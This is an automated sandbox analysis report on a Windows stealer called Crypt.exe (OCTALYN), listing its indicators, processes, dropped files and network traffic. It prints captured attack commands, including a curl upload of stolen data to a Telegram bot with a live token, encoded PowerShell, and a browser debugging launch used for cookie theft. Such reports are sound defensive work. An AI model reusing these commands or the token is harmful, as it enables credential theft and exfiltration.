File name:

Crypt.exe

Full analysis: https://app.any.run/tasks/08bad818-abd9-41ed-874f-c559d96adb92
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Malware Trends Tracker     >>>
Analysis date: June 02, 2025, 00:00:25
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
telegram
evasion
stealer
auto-sch
auto-reg
auto-startup
octalyn
python
discord
susp-powershell
arch-doc
ims-api
generic
api-base64
crypto-regex
arch-html
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, 4 sections
MD5:

3E68962725104A4F2DA2ED3EBED2DED8

SHA1:

BCFD45EE7D5831662601EDBB8A5647D0A144F8B5

SHA256:

6597D0A917F2DEF35809CFCFFD7C9098BC7E97EB62D35FB74486344208FAF61A

SSDEEP:

393216:01eSKrSBJyQ59oxZuq/88t9Qoqu6S5jkMu/mjDetHF9SP0qKiw56pTS9:01eSKrSBJyQ59oxZuq/88t9QoqtS5jrk

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Create files in the Startup directory

      • win64.exe (PID: 1600)

    • Changes the autorun value in the registry

      • win64.exe (PID: 1600)
      • winupd.exe (PID: 7868)

    • Actions looks like stealing of personal data

      • tg_64.exe (PID: 5720)
      • grpconv.exe (PID: 5056)
      • grpconv.exe (PID: 5404)

    • Steals credentials from Web Browsers

      • tg_64.exe (PID: 5720)
      • grpconv.exe (PID: 5056)
      • grpconv.exe (PID: 5404)

    • Uses Task Scheduler to autorun other applications

      • Port.exe (PID: 1244)
      • rundll32.exe (PID: 6644)

    • OCTALYN has been detected

      • tg_64.exe (PID: 5720)
      • powershell.exe (PID: 7948)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 7948)

    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 3140)

    • Suspicious data exfiltration via CURL detected

      • tg_64.exe (PID: 5720)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 5568)

    • Changes powershell execution policy (Bypass)

      • blsd_win64.exe (PID: 6876)

    • Suspicious browser debugging (Possible cookie theft)

      • chrome.exe (PID: 7732)
      • chrome.exe (PID: 6488)
      • msedge.exe (PID: 2064)
      • msedge.exe (PID: 2140)
      • msedge.exe (PID: 5744)
      • msedge.exe (PID: 3096)

  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • Crypt.exe (PID: 5304)
      • netFrame.exe (PID: 5164)
      • tg_64.exe (PID: 5720)
      • uac.exe (PID: 2268)
      • blsd_win64.exe (PID: 6876)

    • Executable content was dropped or overwritten

      • win64.exe (PID: 1600)
      • Crypt.exe (PID: 5304)
      • Port.exe (PID: 1244)
      • uac.exe (PID: 772)

    • Base64-obfuscated command line is found

      • Crypt.exe (PID: 5304)
      • netFrame.exe (PID: 5164)

    • BASE64 encoded PowerShell command has been detected

      • Crypt.exe (PID: 5304)
      • netFrame.exe (PID: 5164)

    • Reads security settings of Internet Explorer

      • Crypt.exe (PID: 5304)
      • netFrame.exe (PID: 5164)
      • not64.exe (PID: 5400)

    • The process creates files with name similar to system file names

      • Port.exe (PID: 1244)

    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • not64.exe (PID: 5400)
      • curl.exe (PID: 1128)
      • blsd_win64.exe (PID: 6876)

    • Checks for external IP

      • svchost.exe (PID: 2196)
      • not64.exe (PID: 5400)
      • uac.exe (PID: 2268)

    • Starts itself from another location

      • Port.exe (PID: 1244)

    • Loads DLL from Mozilla Firefox

      • tg_64.exe (PID: 5720)

    • Potential Corporate Privacy Violation

      • svchost.exe (PID: 2196)
      • uac.exe (PID: 2268)

    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 7948)

    • Connects to unusual port

      • rundll32.exe (PID: 6644)

    • Process drops python dynamic module

      • uac.exe (PID: 772)

    • The process drops C-runtime libraries

      • uac.exe (PID: 772)

    • Process drops legitimate windows executable

      • uac.exe (PID: 772)

    • Data upload via CURL

      • curl.exe (PID: 1128)

    • Loads Python modules

      • uac.exe (PID: 2268)

    • Application launched itself

      • uac.exe (PID: 772)

    • Starts CMD.EXE for commands execution

      • uac.exe (PID: 2268)

    • Accesses product unique identifier via WMI (SCRIPT)

      • WMIC.exe (PID: 6808)

    • Uses WMIC.EXE to obtain Windows Installer data

      • cmd.exe (PID: 7860)

    • Multiple wallet extension IDs have been found

      • blsd_win64.exe (PID: 6876)

    • There is functionality for taking screenshot (YARA)

      • rundll32.exe (PID: 6644)

    • Found regular expressions for crypto-addresses (YARA)

      • rundll32.exe (PID: 6644)

    • Possible usage of Discord/Telegram API has been detected (YARA)

      • blsd_win64.exe (PID: 6876)

    • The process executes Powershell scripts

      • blsd_win64.exe (PID: 6876)

    • MS Edge headless start

      • msedge.exe (PID: 2064)
      • msedge.exe (PID: 5596)
      • msedge.exe (PID: 2140)
      • msedge.exe (PID: 5344)
      • msedge.exe (PID: 5744)
      • msedge.exe (PID: 7552)
      • msedge.exe (PID: 2392)
      • msedge.exe (PID: 3096)

  • INFO

    • Checks supported languages

      • Crypt.exe (PID: 5304)
      • win64.exe (PID: 1600)
      • Port.exe (PID: 1244)
      • ps_suppressor.exe (PID: 4380)
      • not64.exe (PID: 5400)
      • netFrame.exe (PID: 5164)
      • tg_64.exe (PID: 5720)
      • blsd_win64.exe (PID: 6876)
      • rundll32.exe (PID: 6644)
      • rundll32.exe (PID: 7052)
      • winupd.exe (PID: 7868)
      • uac.exe (PID: 772)
      • uac.exe (PID: 2268)
      • curl.exe (PID: 1128)

    • Process checks computer location settings

      • Crypt.exe (PID: 5304)
      • netFrame.exe (PID: 5164)

    • Reads the computer name

      • Crypt.exe (PID: 5304)
      • Port.exe (PID: 1244)
      • netFrame.exe (PID: 5164)
      • blsd_win64.exe (PID: 6876)
      • rundll32.exe (PID: 6644)
      • tg_64.exe (PID: 5720)
      • rundll32.exe (PID: 7052)
      • not64.exe (PID: 5400)
      • uac.exe (PID: 772)
      • curl.exe (PID: 1128)
      • uac.exe (PID: 2268)

    • Create files in a temporary directory

      • Crypt.exe (PID: 5304)
      • tg_64.exe (PID: 5720)
      • grpconv.exe (PID: 7452)
      • grpconv.exe (PID: 5972)
      • uac.exe (PID: 772)
      • grpconv.exe (PID: 5404)

    • Creates files or folders in the user directory

      • win64.exe (PID: 1600)
      • not64.exe (PID: 5400)
      • Port.exe (PID: 1244)
      • tg_64.exe (PID: 5720)
      • grpconv.exe (PID: 7452)
      • grpconv.exe (PID: 5972)
      • grpconv.exe (PID: 4180)
      • grpconv.exe (PID: 1452)
      • grpconv.exe (PID: 5056)
      • grpconv.exe (PID: 5404)
      • grpconv.exe (PID: 7284)
      • grpconv.exe (PID: 5416)

    • Launch of the file from Startup directory

      • win64.exe (PID: 1600)

    • Launch of the file from Registry key

      • win64.exe (PID: 1600)
      • winupd.exe (PID: 7868)

    • Reads Environment values

      • Port.exe (PID: 1244)
      • rundll32.exe (PID: 6644)
      • rundll32.exe (PID: 7052)

    • Checks proxy server information

      • not64.exe (PID: 5400)
      • powershell.exe (PID: 3140)
      • uac.exe (PID: 2268)

    • Reads the software policy settings

      • not64.exe (PID: 5400)

    • Attempting to use instant messaging service

      • not64.exe (PID: 5400)
      • svchost.exe (PID: 2196)

    • Reads the machine GUID from the registry

      • rundll32.exe (PID: 6644)
      • blsd_win64.exe (PID: 6876)
      • Port.exe (PID: 1244)
      • rundll32.exe (PID: 7052)
      • not64.exe (PID: 5400)
      • uac.exe (PID: 2268)

    • Manual execution by a user

      • rundll32.exe (PID: 7052)
      • winupd.exe (PID: 7868)
      • notepad.exe (PID: 7320)
      • notepad.exe (PID: 6496)
      • notepad.exe (PID: 7780)
      • OpenWith.exe (PID: 8048)
      • OpenWith.exe (PID: 5352)
      • OpenWith.exe (PID: 6028)
      • msedge.exe (PID: 2140)
      • OpenWith.exe (PID: 7572)
      • msedge.exe (PID: 3096)
      • notepad.exe (PID: 6456)
      • notepad.exe (PID: 5552)
      • notepad.exe (PID: 7848)
      • notepad.exe (PID: 1088)
      • notepad.exe (PID: 5596)
      • notepad.exe (PID: 7908)
      • notepad.exe (PID: 668)
      • notepad.exe (PID: 7948)
      • notepad.exe (PID: 5408)
      • notepad.exe (PID: 6920)

    • Disables trace logs

      • powershell.exe (PID: 3140)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 7948)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 7948)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 7948)

    • The executable file from the user directory is run by the Powershell process

      • uac.exe (PID: 772)

    • The sample compiled with english language support

      • uac.exe (PID: 772)

    • Execution of CURL command

      • tg_64.exe (PID: 5720)

    • Reads security settings of Internet Explorer

      • WMIC.exe (PID: 6808)

    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • powershell.exe (PID: 716)

    • Potential remote process memory writing (Base64 Encoded 'WriteProcessMemory')

      • blsd_win64.exe (PID: 6876)

    • Potential library load (Base64 Encoded 'LoadLibrary')

      • blsd_win64.exe (PID: 6876)

    • Potential dynamic function import (Base64 Encoded 'GetProcAddress')

      • blsd_win64.exe (PID: 6876)

    • Potential remote process memory interaction (Base64 Encoded 'VirtualAllocEx')

      • blsd_win64.exe (PID: 6876)

    • Potential remote process memory reading (Base64 Encoded 'ReadProcessMemory')

      • blsd_win64.exe (PID: 6876)

    • Potential access to remote process (Base64 Encoded 'OpenProcess')

      • blsd_win64.exe (PID: 6876)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 7948)

    • Application launched itself

      • chrome.exe (PID: 7732)
      • chrome.exe (PID: 6488)
      • msedge.exe (PID: 2064)
      • msedge.exe (PID: 2140)
      • msedge.exe (PID: 5744)
      • msedge.exe (PID: 3096)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (61.6)
.dll | Win32 Dynamic Link Library (generic) (14.6)
.exe | Win32 Executable (generic) (10)
.exe | Win16/32 Executable Delphi generic (4.6)
.exe | Generic Win/DOS Executable (4.4)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 0000:00:00 00:00:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit, No debug
PEType: PE32
LinkerVersion: 6
CodeSize: 2048
InitializedDataSize: 15986688
UninitializedDataSize: -
EntryPoint: 0x1635
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
254
Monitored processes
130
Malicious processes
21
Suspicious processes
1

Behavior graph

Click at the process to see the details
start crypt.exe powershell.exe no specs conhost.exe no specs port.exe win64.exe netframe.exe no specs ps_suppressor.exe no specs not64.exe #OCTALYN tg_64.exe powershell.exe conhost.exe no specs svchost.exe blsd_win64.exe schtasks.exe no specs conhost.exe no specs rundll32.exe grpconv.exe no specs #OCTALYN powershell.exe no specs conhost.exe no specs schtasks.exe no specs conhost.exe no specs rundll32.exe no specs winupd.exe grpconv.exe no specs grpconv.exe no specs uac.exe grpconv.exe no specs curl.exe conhost.exe no specs uac.exe grpconv.exe no specs grpconv.exe cmd.exe no specs conhost.exe no specs wmic.exe no specs powershell.exe no specs conhost.exe no specs grpconv.exe no specs grpconv.exe powershell.exe no specs conhost.exe no specs grpconv.exe no specs grpconv.exe no specs powershell.exe no specs conhost.exe no specs grpconv.exe no specs powershell.exe no specs conhost.exe no specs grpconv.exe no specs grpconv.exe no specs powershell.exe no specs conhost.exe no specs grpconv.exe no specs powershell.exe no specs conhost.exe no specs grpconv.exe no specs grpconv.exe no specs grpconv.exe no specs powershell.exe no specs conhost.exe no specs notepad.exe no specs notepad.exe no specs notepad.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs openwith.exe no specs chrome.exe no specs rundll32.exe no specs chrome.exe chrome.exe no specs openwith.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs openwith.exe no specs openwith.exe no specs chrome.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs slui.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs notepad.exe no specs notepad.exe no specs notepad.exe no specs notepad.exe no specs notepad.exe no specs notepad.exe no specs notepad.exe no specs notepad.exe no specs notepad.exe no specs notepad.exe no specs crypt.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
668"C:\WINDOWS\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\GetBookmarks.txtC:\Windows\System32\notepad.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
680"C:\Windows\SysWOW64\grpconv.exe" /stext "C:\Users\admin\AppData\Roaming\DefenderLogs-output_20250602000037.txt"C:\Windows\SysWOW64\grpconv.exeblsd_win64.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Progman Group Converter
Exit code:
4294967295
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\grpconv.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
716"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbgBrACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGUAcQBpACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAVABoAGUAIABhAHAAcABsAGkAYwBhAHQAaQBvAG4AIAB3AGEAcwAgAHUAbgBhAGIAbABlACAAdABvACAAcwB0AGEAcgB0ACAAYwBvAHIAcgBlAGMAdABsAHkAIAAoADAAeABjADAAMAAwADAAMAA3AGIAKQAuACAAQwBsAGkAYwBrACAATwBLACAAdABvACAAYwBsAG8AcwBlACAAdABoAGUAIABhAHAAcABsAGkAYwBhAHQAaQBvAG4ALgAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAaABuAGQAIwA+AA=="C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCrypt.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
772"C:\Users\admin\AppData\Local\Temp\uac.exe" C:\Users\admin\AppData\Local\Temp\uac.exe
powershell.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\uac.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
1088"C:\WINDOWS\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\system_info.txtC:\Windows\System32\notepad.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
1128curl.exe -F "chat_id=-1002543167462" -F "document=@\"C:\Users\admin\AppData\Local\Temp\admin_OctalynRetrieved.zip\"" -F "caption=DIR: Cryptowallets Games Socials VPN " https://api.telegram.org/bot7707984358:AAEIukqaP3WJYxoS3Cr2caD890RFs_jFfII/sendDocumentC:\Windows\System32\curl.exe
tg_64.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
HIGH
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
1196\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1240"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\admin\AppData\Local\Google\Chrome\User Data" --extension-process --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3092 --field-trial-handle=1984,i,13720578385027826937,7926287347579266832,262144 --disable-features=PaintHolding --variations-seed-version /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
HIGH
Description:
Google Chrome
Exit code:
4294967295
Version:
122.0.6261.70
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
1244"C:\Users\admin\AppData\Local\Temp\Port.exe" C:\Users\admin\AppData\Local\Temp\Port.exe
Crypt.exe
User:
admin
Integrity Level:
HIGH
Exit code:
3
Version:
1.6.0
Modules
Images
c:\users\admin\appdata\local\temp\port.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
1284"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --disable-quic --noerrdialogs --user-data-dir="C:\Users\admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --mojo-platform-channel-handle=4064 --field-trial-handle=1984,i,13720578385027826937,7926287347579266832,262144 --disable-features=PaintHolding --variations-seed-version /prefetch:8C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
HIGH
Description:
Google Chrome
Exit code:
0
Version:
122.0.6261.70
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
Total events
76 847
Read events
76 764
Write events
81
Delete events
2

Modification events

(PID) Process:(5400) not64.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(5400) not64.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(5400) not64.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(1600) win64.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:delete valueName:WindowsUpdate
Value:
(PID) Process:(1600) win64.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:winupd
Value:
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winupd.exe
(PID) Process:(3140) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(3140) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(3140) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(3140) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(3140) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
Executable files
202
Suspicious files
382
Text files
217
Unknown types
0

Dropped files

PID
Process
Filename
Type
5304Crypt.exeC:\Users\admin\AppData\Local\Temp\win64.exeexecutable
MD5:18029CE6FB5ECEAB48EC1721C1C3D5A0
SHA256:B495D130B930FC7C7ED5C54996ECD1589DE51DF36BC1CF8D3C87A5F99D37E587
5304Crypt.exeC:\Users\admin\AppData\Local\Temp\Port.exeexecutable
MD5:D9ECE5EF4B7980F4A2D7755B9688E73A
SHA256:9791BAFF96966181E181BD77C6B58D5653664C4C69F0423730C8FB769A6EE5D1
5720tg_64.exeC:\Users\admin\AppData\Local\Temp\Octalyn\discord.txt
MD5:
SHA256:
5720tg_64.exeC:\Users\admin\AppData\Local\Temp\1GB6lAQ.db
MD5:
SHA256:
5400not64.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\json[1].jsonbinary
MD5:7DEFB0085FC9B85361B2BD2943EF279E
SHA256:A1651568AA1D6A70697BEB4975E046C7B5E9C16DCED36744B14ABC9A0DD75FC1
5304Crypt.exeC:\Users\admin\AppData\Local\Temp\netFrame.exeexecutable
MD5:2B59A5D7C8C63AAA313EF7D969FF1B9D
SHA256:DF03A67AA8C6679FD79B40F2D6E4FE05C2968FBF813F8C13EA8147535A46CB58
5720tg_64.exeC:\Users\admin\AppData\Local\Temp\eaDhiKq.db
MD5:
SHA256:
1600win64.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winupd.exeexecutable
MD5:18029CE6FB5ECEAB48EC1721C1C3D5A0
SHA256:B495D130B930FC7C7ED5C54996ECD1589DE51DF36BC1CF8D3C87A5F99D37E587
5304Crypt.exeC:\Users\admin\AppData\Local\Temp\ps_suppressor.exeexecutable
MD5:7053207081615A591F31B7D99ECB22CC
SHA256:9E0EA85D56023DB4D22CCBB412A408F2D1A7B7D2BC7DCAA6C30C0FBF82C5C83B
5720tg_64.exeC:\Users\admin\AppData\Local\Temp\QTgm8d1.db
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
10
TCP/UDP connections
214
DNS requests
136
Threats
30

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
2.16.241.19:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
2268
uac.exe
GET
200
208.95.112.1:80
http://ip-api.com/json/91.217.249.43
unknown
whitelisted
8116
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
8116
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
5400
not64.exe
GET
200
192.124.249.22:80
http://ocsp.godaddy.com//MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH%2B3ahq1OMCAxvnFQ%3D%3D
unknown
whitelisted
5400
not64.exe
GET
200
192.124.249.22:80
http://ocsp.godaddy.com//MEIwQDA%2BMDwwOjAJBgUrDgMCGgUABBQdI2%2BOBkuXH93foRUj4a7lAr4rGwQUOpqFBxBnKLbv9r0FQW4gwZTaD94CAQc%3D
unknown
whitelisted
5400
not64.exe
GET
200
34.117.59.81:80
http://ipinfo.io/json
unknown
whitelisted
5400
not64.exe
GET
200
192.124.249.22:80
http://ocsp.godaddy.com//MEkwRzBFMEMwQTAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX%2B2yz8LQsgM4CCEVy5zGFpEO7
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
5608
RUXIMICS.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5496
MoUsoCoreWorker.exe
2.16.241.19:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5496
MoUsoCoreWorker.exe
2.23.246.101:80
www.microsoft.com
Ooredoo Q.S.C.
QA
whitelisted
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
5400
not64.exe
34.117.59.81:80
ipinfo.io
GOOGLE-CLOUD-PLATFORM
US
whitelisted
5400
not64.exe
149.154.167.220:443
api.telegram.org
Telegram Messenger Inc
GB
whitelisted
5400
not64.exe
192.124.249.22:80
ocsp.godaddy.com
SUCURI-SEC
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 51.124.78.146
whitelisted
crl.microsoft.com
  • 2.16.241.19
  • 2.16.241.12
whitelisted
www.microsoft.com
  • 2.23.246.101
  • 95.101.149.131
whitelisted
google.com
  • 142.250.185.142
whitelisted
ipinfo.io
  • 34.117.59.81
whitelisted
api.telegram.org
  • 149.154.167.220
whitelisted
ocsp.godaddy.com
  • 192.124.249.22
  • 192.124.249.36
